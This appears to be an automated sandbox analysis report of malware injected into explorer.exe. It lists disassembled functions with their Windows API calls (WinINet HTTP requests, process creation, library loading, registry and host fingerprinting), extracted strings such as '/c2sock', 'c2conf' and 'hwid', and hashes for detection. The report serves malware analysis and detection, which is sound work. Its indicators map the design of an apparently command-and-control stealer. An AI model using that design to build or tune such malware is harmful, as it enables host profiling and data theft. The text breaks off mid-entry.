MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00000001403AFE58 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000001403AFE8F
GetCurrentProcessId.KERNEL32 ref: 00000001403AFE9A
GetCurrentThreadId.KERNEL32 ref: 00000001403AFEA6
GetTickCount.KERNEL32 ref: 00000001403AFEB2
QueryPerformanceCounter.KERNEL32 ref: 00000001403AFEC3

Memory Dump Source

Source File: 00000000.00000002.283028819.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.283024724.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283486430.00000001405D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283497570.00000001405D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283503666.00000001405E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283503666.00000001405F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283503666.00000001405F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283518374.00000001405F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283526999.0000000140625000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283531068.0000000140627000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_lJ2eYRm0Bd.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 616ddfd438224194e569397b093716ae8ee4a8aa5a7343615e2ae389b3f0f362
Instruction ID: 101157cd47283f9489e87a1647378407c79a5f7933ada9f2cf7b50bce385bd5e
Opcode Fuzzy Hash: 616ddfd438224194e569397b093716ae8ee4a8aa5a7343615e2ae389b3f0f362
Instruction Fuzzy Hash: 06018431224A808AE7428F23F8403D56760FB4DB90F456621EF5E4B7B4DB3CC8978B40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 5632, Parent PID: 7020COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	34.4%
Total number of Nodes:	585
Total number of Limit Nodes:	8

Executed Functions

Function 008B8E94 Relevance: 93.9, APIs: 23, Strings: 29, Instructions: 2931COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008B920D
GetComputerNameExA.KERNELBASE(00000002,?,?), ref: 008B9271
_strlen.LIBCMT ref: 008B9350
_strlen.LIBCMT ref: 008B957D
_strlen.LIBCMT ref: 008B97E7
_strlen.LIBCMT ref: 008B980C
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 008B9EFA
_strlen.LIBCMT ref: 008BA26B
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 008BA51C
_strlen.LIBCMT ref: 008BA84D
_strlen.LIBCMT ref: 008BAB2F
_strlen.LIBCMT ref: 008BBBEF
_strlen.LIBCMT ref: 008BBD81
GetComputerNameExA.KERNEL32(00000004,?,?), ref: 008BBFFD

Strings

h5:~, xrefs: 008B90E4
ngua, xrefs: 008BBA5A
*y&, xrefs: 008B9D0B
$uhb, xrefs: 008B9423
yFq, xrefs: 008B96B7
i5:~, xrefs: 008B9BCC
%uhb, xrefs: 008BA236
@5!, xrefs: 008B9395
vYh, xrefs: 008B9304
%uhb, xrefs: 008BBF47
vYh, xrefs: 008B9077
[&T!, xrefs: 008B937F
U: , xrefs: 008BBBBF
C: , xrefs: 008BAE01
\&T!, xrefs: 008BA5AC
uYh, xrefs: 008B92EE
vYh, xrefs: 008BB50E
ge: , xrefs: 008BBA53
yFq, xrefs: 008BB160
L*Z{, xrefs: 008B9105
*y&, xrefs: 008BB6E8
vYh, xrefs: 008BB8DC
user32.dll, xrefs: 008B9EE4, 008B9EE9, 008B9F02
i5:~, xrefs: 008BA33A
n: , xrefs: 008BACCA
vYh, xrefs: 008BA2C5
@5!, xrefs: 008BA11F
xFq, xrefs: 008B96A1
L*Z{, xrefs: 008BB4B1

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen$ComputerName$CallbackDevicesDispatcherDisplayEnumUser
String ID: @5!$ @5!$$uhb$%uhb$%uhb$*y&$*y&$C: $L*Z{$L*Z{$U: $[&T!$\&T!$ge: $h5:~$i5:~$i5:~$n: $ngua$uYh$user32.dll$vYh$vYh$vYh$vYh$vYh$xFq$yFq$yFq
API String ID: 1770890290-2309313597
Opcode ID: 24851c02e2f64242adc694596e379bd14826af36e75dbe0f82fbd4a8385fe0ff
Instruction ID: ddba5f96694a377f299503448167962b2964a83bd58c6ee1e7472c26b5818233
Opcode Fuzzy Hash: 24851c02e2f64242adc694596e379bd14826af36e75dbe0f82fbd4a8385fe0ff
Instruction Fuzzy Hash: F833A2B1900B01CBDB348F28C885AAAB7E5FF94704F24891EE59ADB761D771E845CB43

Uniqueness

Uniqueness Score: -1.00%

Function 008B15E8 Relevance: 71.9, APIs: 13, Strings: 26, Instructions: 3642processlibraryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008B17CC
CloseHandle.KERNEL32(?), ref: 008B17D7
LoadLibraryW.KERNEL32(?), ref: 008B1922
_strlen.LIBCMT ref: 008B1DD5
_strlen.LIBCMT ref: 008B1DE9

Strings

L*Z{, xrefs: 008B3522
gfff, xrefs: 008B225F
lz[, xrefs: 008B301E
xFq, xrefs: 008B198B
4N(P, xrefs: 008B5529
.ps1, xrefs: 008B5045
3N(P, xrefs: 008B2016
kz[, xrefs: 008B2C6C
UOW`, xrefs: 008B2D00
vYh, xrefs: 008B20D8
VOW`, xrefs: 008B30BC
%TEMP%, xrefs: 008B3971
%uhb, xrefs: 008B417F
h5:~, xrefs: 008B1FAF
%uhb, xrefs: 008B2315
*y&, xrefs: 008B20C2
.exe, xrefs: 008B25AA
yFq, xrefs: 008B336B
i5:~, xrefs: 008B332E
\&T!, xrefs: 008B2115
)y&, xrefs: 008B20B7
@5!, xrefs: 008B3487
L*Z{, xrefs: 008B2F88
\&T!, xrefs: 008B5103
[&T!, xrefs: 008B210A
.dll, xrefs: 008B4DB7

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen$CloseCreateHandleLibraryLoadProcess
String ID: @5!$%TEMP%$%uhb$%uhb$)y&$*y&$.dll$.exe$.ps1$3N(P$4N(P$L*Z{$L*Z{$UOW`$VOW`$[&T!$\&T!$\&T!$gfff$h5:~$i5:~$kz[$lz[$vYh$xFq$yFq
API String ID: 1253903897-1726296848
Opcode ID: ed7ab0a7ba8c0644a0fc048e3155505be7927be7559296bff38d920bea3efc00
Instruction ID: 80b324162507d29843485bceeae97628469216b8047b204e0a0f31062b19aaba
Opcode Fuzzy Hash: ed7ab0a7ba8c0644a0fc048e3155505be7927be7559296bff38d920bea3efc00
Instruction Fuzzy Hash: 0663E9B1510B058FDF349F28C9556AAB7E1FB54314F64892FE09BCBBA0D631E9948B03

Uniqueness

Uniqueness Score: -1.00%

Function 0089A30C Relevance: 36.7, APIs: 11, Strings: 9, Instructions: 1675stringfilenativeCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0089A576
lstrcmpW.KERNEL32(?,008E47AE), ref: 0089A728
lstrcmpW.KERNEL32(?,008E47AE), ref: 0089A9CA
NtCreateFile.NTDLL(?,00100001,000000AD,?,00000000,00000000,00000007,00000001,00004021,00000000,00000000), ref: 0089B348

Strings

@T>, xrefs: 0089A79E
@T>, xrefs: 0089AE02
V}6F, xrefs: 0089A547
@T>, xrefs: 0089AC63
W}6F, xrefs: 0089AA5E
ntdll.dll, xrefs: 0089AA74, 0089AB3A, 0089B31B
J], xrefs: 0089AC90
W}6F, xrefs: 0089A73B
@T>, xrefs: 0089A55D

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: lstrcmp$CreateFilelstrlen
String ID: @T>$ @T>$ @T>$ @T>$V}6F$W}6F$W}6F$ntdll.dll$J]
API String ID: 2485617829-677030046
Opcode ID: 8ae48622704d0198bc856efc74fc6b3ecac33538fc4490fb0ca061427f4ca74d
Instruction ID: 2e7d9662e5b2e699df7d1bef966883d41855c76909a91f1db8d9d8b35e1e2559
Opcode Fuzzy Hash: 8ae48622704d0198bc856efc74fc6b3ecac33538fc4490fb0ca061427f4ca74d
Instruction Fuzzy Hash: 2CD2F6B1E002198BDF28AB98D9966BDBAB1FB14314F3C052AE515FB790D7318D409BD3

Uniqueness

Uniqueness Score: -1.00%

Function 008BC95C Relevance: 34.7, APIs: 10, Strings: 9, Instructions: 1495networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(?), ref: 008BCE9E
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008BD1F9
_strlen.LIBCMT ref: 008BD560
HttpSendRequestA.WININET(?,008E6BB6,0000002F,?,00000000), ref: 008BD57C
HttpOpenRequestW.WININET(?,008E5B72,?,00000000,00000000,00000000,00000000,00000000), ref: 008BD92F
GetModuleHandleW.KERNEL32(?), ref: 008BD9B3
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 008BE182
InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008BE24F

Strings

c2conf, xrefs: 008BDD64
@T>, xrefs: 008BCB4F
Libr, xrefs: 008BDF77
W}6F, xrefs: 008BE288
J], xrefs: 008BD41F
V}6F, xrefs: 008BCD1A
aryW, xrefs: 008BDF70
@T>, xrefs: 008BD8F3
W}6F, xrefs: 008BCD30

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Internet$HandleHttpOpenRequest$AvailableCloseConnectDataModuleQuerySend_strlen
String ID: @T>$ @T>$Libr$V}6F$W}6F$W}6F$aryW$c2conf$J]
API String ID: 1133057487-1714174141
Opcode ID: f3ec1113e0c53860d01d44a51472561dc3ca0e1f6939e8ad1ee52906a4970f23
Instruction ID: ffc404716c031b4eca12eb71186b73cb5692199a62919e867a4fec7e842a9ad1
Opcode Fuzzy Hash: f3ec1113e0c53860d01d44a51472561dc3ca0e1f6939e8ad1ee52906a4970f23
Instruction Fuzzy Hash: 7EC2AEB1D0121D9FDF25CB98C885AFDBEB1FB15314F20462BE515EB3A0DB309A418B92

Uniqueness

Uniqueness Score: -1.00%

Function 008B6C38 Relevance: 28.9, APIs: 9, Strings: 7, Instructions: 927memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000028), ref: 008B7364
RtlFreeHeap.NTDLL(?,00000000,?), ref: 008B7CA2
GetProcessHeap.KERNEL32 ref: 008B7CA4

Strings

[&T!, xrefs: 008B6DFD
\&T!, xrefs: 008B781D
BM, xrefs: 008B7746
uYh, xrefs: 008B6E5B
vYh, xrefs: 008B6E66
\&T!, xrefs: 008B6E08
\&T!, xrefs: 008B792B

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Heap$AllocateFreeProcess
String ID: BM$[&T!$\&T!$\&T!$\&T!$uYh$vYh
API String ID: 3437498585-3685552436
Opcode ID: 93e975e47c9cc60fd8a860efedcf5824d9d9497686e15b164a56498e116cf9a4
Instruction ID: 985a4d2f99dace2518dff326257c07499313be2f8e4959e957b32e5da44f1944
Opcode Fuzzy Hash: 93e975e47c9cc60fd8a860efedcf5824d9d9497686e15b164a56498e116cf9a4
Instruction Fuzzy Hash: D772A37150D705DFCB289F18C9A56AEBBE0FBD5304F20881EE199CB360E634E8959B47

Uniqueness

Uniqueness Score: -1.00%

Function 00893CBF Relevance: 18.2, APIs: 6, Strings: 4, Instructions: 676stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00893D9B
lstrcatW.KERNEL32(?,00000000), ref: 00893E8B

Strings

@y, xrefs: 008941AE
@, xrefs: 00893CDC
#sQ, xrefs: 00893D88
#sQ, xrefs: 008945F0

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: lstrcat
String ID: #sQ$#sQ$@$@y
API String ID: 4038537762-1941683038
Opcode ID: 74d1154d30cfd0758bafbc27125c52e7d9f8a099ec3b3eb219b15c6ed91b0852
Instruction ID: 83f7886f6513cd5483245bb6aa6692d0bb493a7ff7ea755764dc80a29f5b09da
Opcode Fuzzy Hash: 74d1154d30cfd0758bafbc27125c52e7d9f8a099ec3b3eb219b15c6ed91b0852
Instruction Fuzzy Hash: 81322BB19083459FDF347F68894392EBAE0FB95708F2C582EF995E6361E631C9419B03

Uniqueness

Uniqueness Score: -1.00%

Function 008A9A56 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AB96E: wsprintfW.USER32 ref: 008ABA2F

_strlen.LIBCMT ref: 008AA107

Strings

UeK, xrefs: 008A9DA9
file, xrefs: 008A9E5D
%X%H, xrefs: 008A9A91
pid, xrefs: 008A9FE2
lid, xrefs: 008AA000
&X%H, xrefs: 008AA27E
hwid, xrefs: 008A9FCE
/c2sock, xrefs: 008A9DF1

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlenwsprintf
String ID: %X%H$&X%H$/c2sock$UeK$file$hwid$lid$pid
API String ID: 3365003327-41233642
Opcode ID: f45bcebcaaf903c9890f882eacfd6962d9610c3e55c084155e6a6d1f0bcede93
Instruction ID: 2bab074d73172271d47cd94ae75da0443ec6d0f4938cd2d011e32ceab96f4397
Opcode Fuzzy Hash: f45bcebcaaf903c9890f882eacfd6962d9610c3e55c084155e6a6d1f0bcede93
Instruction Fuzzy Hash: 2602E3B454C3459BEB289F58C8C263EBAE4FB92314F14491FF5C6DAA61E331D9809B43

Uniqueness

Uniqueness Score: -1.00%

Function 008AD8F0 Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 845COMMON

Download Yara Rule

Strings

\&T!, xrefs: 008AE34B
\&T!, xrefs: 008AE44A
vYh, xrefs: 008AD9B0
\&T!, xrefs: 008AD94A
vYh, xrefs: 008AE106
\&T!, xrefs: 008AE38D

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: \&T!$\&T!$\&T!$\&T!$vYh$vYh
API String ID: 0-2226890878
Opcode ID: 93a100ad84c70d9199341d65824cd6708b9f7f7cc6d9e2a86c9891078080313f
Instruction ID: e334adba5c37d5ba40e34b465512723f021435e4829b9c3977991db03d5f29c0
Opcode Fuzzy Hash: 93a100ad84c70d9199341d65824cd6708b9f7f7cc6d9e2a86c9891078080313f
Instruction Fuzzy Hash: 6762C571D0121D9BEF24DB9899856AEBBB0FB16304F284D27D516FBA50E334CE418B93

Uniqueness

Uniqueness Score: -1.00%

Function 008998EC Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 394
stringfilenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(?,00120089,?,?,00000000,00000080,00000003,00000001,00000020,00000000,00000000), ref: 00899A11
lstrlenW.KERNEL32(?), ref: 00899CF5
lstrlenW.KERNEL32(?), ref: 00899F4B

Strings

\&T!, xrefs: 00899BA2
\&T!, xrefs: 00899C31
ntdll.dll, xrefs: 008999E2, 008999E7, 00899A16

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: lstrlen$CreateFile
String ID: \&T!$\&T!$ntdll.dll
API String ID: 2663515375-4147476080
Opcode ID: 7ac229b122fb19c0ed34d899f95cc61cd5b4658ddcba6764224725d7ecba1851
Instruction ID: 3050dd31de32c904a01b0c7a14b9b29c6638e06613efa3a2d659bcfeed6a3858
Opcode Fuzzy Hash: 7ac229b122fb19c0ed34d899f95cc61cd5b4658ddcba6764224725d7ecba1851
Instruction Fuzzy Hash: E9E19471D0421D9FCF34AF9CCC816ADBAB0FB15308F28055EE5A6EA350D37699809B93

Uniqueness

Uniqueness Score: -1.00%

Function 00892ABC Relevance: 4.3, Strings: 3, Instructions: 590COMMON

Download Yara Rule

Strings

\&T!, xrefs: 00892E0A
vYh, xrefs: 0089300D
[&T!, xrefs: 00892B9A

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: [&T!$\&T!$vYh
API String ID: 0-3973075337
Opcode ID: 85c0b5d65abd85ff568d04828caf1c41fea5e04faffd6af46338f83d85fa04c5
Instruction ID: 952e09a0672a2005b39156f1ef96f0dd7e86d742afa4238c67f05c1b18857c03
Opcode Fuzzy Hash: 85c0b5d65abd85ff568d04828caf1c41fea5e04faffd6af46338f83d85fa04c5
Instruction Fuzzy Hash: 3D22C8B1508205AFCF38BF58C98552EBBE0FB94314F28892FF196C67A0D635D9849B47

Uniqueness

Uniqueness Score: -1.00%

Function 008AF8C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 571COMMON

Download Yara Rule

Strings

@T>, xrefs: 008AFA4D

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: @T>
API String ID: 0-3998906393
Opcode ID: b95b6e15a1c1627dd80d73a891ffdee5f5786abfbe70e28dc915e330d0567661
Instruction ID: f6a0149e7e094ed7dc5d3fd4f8dc8804a951e44adc0926d77ce9d62913e50d66
Opcode Fuzzy Hash: b95b6e15a1c1627dd80d73a891ffdee5f5786abfbe70e28dc915e330d0567661
Instruction Fuzzy Hash: 9E22D5719093059BEB289B58C58566E76E1FB96704F244D3FF289CBBA1D334C844AF43

Uniqueness

Uniqueness Score: -1.00%

Function 00899F88 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 212
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0089A2B9

Strings

ntdll.dll, xrefs: 0089A029, 0089A104, 0089A2BB

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FileRead
String ID: ntdll.dll
API String ID: 2738559852-2227199552
Opcode ID: fa6505c31bd8ebec8312b48056d9e1f0b0eddcadb5184ccc0218f3bfdc163625
Instruction ID: b23d60f2c385e863b07fae3e34a10675fe0937266c603a863bb619dfae08d0f0
Opcode Fuzzy Hash: fa6505c31bd8ebec8312b48056d9e1f0b0eddcadb5184ccc0218f3bfdc163625
Instruction Fuzzy Hash: AF71D770A142459FDF18AF6DCC91A3DB6E4FB88714F18492EF195DA790EA26DC408B43

Uniqueness

Uniqueness Score: -1.00%

Function 0089C7DB Relevance: 3.6, Strings: 2, Instructions: 1067COMMON

Download Yara Rule

Strings

^&R0, xrefs: 0089C86B
_&R0, xrefs: 0089C897

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: ^&R0$_&R0
API String ID: 0-3859528112
Opcode ID: ad8ab2a2b0f89cf77d3529bcb751b970a5ec13557eef7c72d3a843a9f5bcdd5e
Instruction ID: bd64f2f2c9c2108792030790dc6ea5df70ff116241ca7b84de83c0d39c519b47
Opcode Fuzzy Hash: ad8ab2a2b0f89cf77d3529bcb751b970a5ec13557eef7c72d3a843a9f5bcdd5e
Instruction Fuzzy Hash: 1792A2B1D043199FDF24FF98C885AFDBAB1FB14304F28452AE516FB290D7719A408B86

Uniqueness

Uniqueness Score: -1.00%

Function 008B8144 Relevance: 3.1, APIs: 2, Instructions: 91
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 008B820C
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 008B8216

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5088f8335fb572ac0981537a5cc96e75446c465e306f14df410cc9962c472e4f
Instruction ID: 37c9dfa49e814b8f72c3b63e2b9259b2c898e14042dc94d8755a9ff57daf2efd
Opcode Fuzzy Hash: 5088f8335fb572ac0981537a5cc96e75446c465e306f14df410cc9962c472e4f
Instruction Fuzzy Hash: 6A21E635A0A308DFDA25561CDCC59AF769CFB963A0F208827F585C6350EA36CC56C753

Uniqueness

Uniqueness Score: -1.00%

Function 008D9D44 Relevance: 1.6, APIs: 1, Instructions: 116
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D4594: RtlFreeHeap.NTDLL(00000000,00000000,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45AA
Part of subcall function 008D4594: GetLastError.KERNEL32(?,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45B5

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,008DA1D8,008A5109,?), ref: 008D9DB6

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3335090040-0
Opcode ID: fe47508c6c949f23fa556d215c6dde6e9c1588bc659e9298e4127f231e10ecb0
Instruction ID: 83d1392b56248ceaf5f62b7aed6bb34abc2471d21d022c0298d4e2c1bfb2db75
Opcode Fuzzy Hash: fe47508c6c949f23fa556d215c6dde6e9c1588bc659e9298e4127f231e10ecb0
Instruction Fuzzy Hash: 81317C71900214AECB10AFA9DC46A6A7FA9FF05750B1582BAF544E7362E7709A00DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 008C1349 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00030473,008C0DC3), ref: 008C134E

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7db5dd6ce993eab5d7965a9aeadd23df12f36382f21c141477cae0e90a7b3b8c
Instruction ID: db6a6f556d5fedfc704d017610487c6c5b15358feebdde5efbf349dcfe4af5f2
Opcode Fuzzy Hash: 7db5dd6ce993eab5d7965a9aeadd23df12f36382f21c141477cae0e90a7b3b8c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 008B83DC Relevance: 21.6, APIs: 7, Strings: 5, Instructions: 629registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,008E6812,00000000,00020019,?), ref: 008B8463
RegEnumKeyExW.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008B8720
wsprintfW.USER32 ref: 008B8AA5
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?), ref: 008B8BA9
RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?), ref: 008B8BE4
_strlen.LIBCMT ref: 008B8E46

Strings

vYh, xrefs: 008B8523
\&T!, xrefs: 008B897A
\&T!, xrefs: 008B869D
[&T!, xrefs: 008B8560
vYh, xrefs: 008B889C

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Open$EnumQueryValue_strlenwsprintf
String ID: [&T!$\&T!$\&T!$vYh$vYh
API String ID: 2763413632-816245833
Opcode ID: f7f2e0aee246385773fd1b5f326eec3d4ab2baca7630a652fc17869d7567c5c1
Instruction ID: dc9357f43366ee56a3e59e0dae881e0c1f57f2739e73174c1f1dfc7e3eb346b8
Opcode Fuzzy Hash: f7f2e0aee246385773fd1b5f326eec3d4ab2baca7630a652fc17869d7567c5c1
Instruction Fuzzy Hash: 8D326CB1D0020ADFCF248FD8C9859EEBAB8FB14314F24491AE416EB360DB729941DB57

Uniqueness

Uniqueness Score: -1.00%

Function 008973F0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(?), ref: 00897560
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00897697
FindCloseChangeNotification.KERNELBASE(?), ref: 008976A0
GetFileSizeEx.KERNEL32(?,?), ref: 00897995
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00897A12
CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00897AA7
ExitProcess.KERNEL32 ref: 00897B74

Strings

\&T!, xrefs: 0089746B
\&T!, xrefs: 008976E3

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: File$Close$ChangeCreateExitFindHandleModuleNameNotificationProcessReadSize
String ID: \&T!$\&T!
API String ID: 394432249-1308122536
Opcode ID: d9c743573879e986a3e69cf40868b06808e8220479a734038bed6202882e9bf6
Instruction ID: a47f10f592d3e29035e80fda12590114e930bca52147c66cc0b0afa6f331d128
Opcode Fuzzy Hash: d9c743573879e986a3e69cf40868b06808e8220479a734038bed6202882e9bf6
Instruction Fuzzy Hash: A902B370628B05CFCF34AF58C59562ABBE0FB547147288D2ED89BC7B61E234F8518B16

Uniqueness

Uniqueness Score: -1.00%

Function 008CCA65 Relevance: 9.3, APIs: 6, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 008CCBF8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008CCC14
__allrem.LIBCMT ref: 008CCC2B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008CCC49
__allrem.LIBCMT ref: 008CCC60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008CCC7E

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 0311785a7529f31dd91a8fde15ec96c91375ead30ef5ac0c05c8c377e2f3f5f6
Instruction ID: dc28aec98b8d9c907009e018cafa0bfe863234876edf24df78c0f73ce86e5099
